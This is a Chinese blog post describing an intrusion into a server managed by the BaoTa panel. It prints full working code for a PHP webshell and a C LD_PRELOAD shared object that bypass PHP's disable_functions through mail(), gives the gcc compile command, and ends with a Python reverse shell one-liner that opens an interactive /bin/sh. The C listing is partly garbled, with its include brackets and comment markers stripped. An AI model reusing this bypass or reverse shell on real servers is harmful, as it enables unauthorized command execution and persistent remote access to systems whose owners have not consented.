查看disable_functions,发现是可爱的宝塔禁用了passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru
,还有啥是宝塔不能禁的。。。还能怎么办,接着肝,在网上学习了大佬的帖子
https://www.meetsec.cn/index.php/archives/44/
尝试利用LD_PRELOAD绕过disable_functions
直接上代码
bypass_disablefunc.php<?php
echo "
example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
";$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "
cmdline: " . $evil_cmdline . "
";putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "
output:
" . nl2br(file_get_contents($out_path)) . "
unlink($out_path);
?>
bypass_disablefunc.c#define _GNU_SOURCE
#include stdlib.h
#include stdio.h
#include string.h
extern char environ;
__attribute__ ((__constructor__)) void preload (void)
{
get command line options and arg
const char cmdline = getenv(EVIL_CMDLINE);
unset environment variable LD_PRELOAD.
unsetenv(LD_PRELOAD) no effect on some
distribution (e.g., centos), I need crafty trick.
int i;
for (i = 0; environ[i]; ++i) {
if (strstr(environ[i], LD_PRELOAD)) {
environ[i][0] = '0';
}
}
executive command
system(cmdline);
}
用命令 gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so 将 bypass_disablefunc.c 编译为共享对象 bypass_disablefunc_x64.so:
要根据目标架构编译成不同版本,在 x64 的环境中编译,若不带编译选项则默认为 x64,若要编译成 x86 架构需要加上 -m32 选项。
通过冰蝎上传,然后测试效果:
命令执行成功。Nc反弹shell
提示没有-e的参数,直接使用python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
反弹成功
总结:这次的测试,写入冰蝎的过程要注意编码问题。然后就是利用LD_PRELOAD绕过disable_functions。
标签:
相关推荐
135
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
